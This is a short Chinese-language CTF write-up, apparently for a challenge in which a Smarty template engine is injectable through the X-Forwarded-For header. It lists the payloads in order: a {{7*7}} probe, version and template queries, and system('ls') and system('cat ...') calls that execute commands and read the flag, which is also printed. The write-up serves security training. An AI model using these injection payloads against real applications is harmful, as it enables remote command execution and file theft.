访问页面,页脚提示smarty;
根据先前对Smarty的接触,比较了解的是SSTI的漏洞;
题目提示了XFF,试一下XFF处有没有SSTI漏洞注入点;
抓包修改,添加XFF;
{{7*7}}
可以注意到response的信息中,有一处变化;
证明确实存在SSTI漏洞;
输入
{$smarty.version}
以获得对应的smarty版本;
输入
{$smarty.template}
以返回当前的模板文件的名称;
输入
{if system('ls')}{/if}
查看当前目录下的文件;
输入
{if system('cat /../flag')}{/if}
拿到flag
flag{71c130dd-21c5-462a-9ef2-0fa87f458c5c}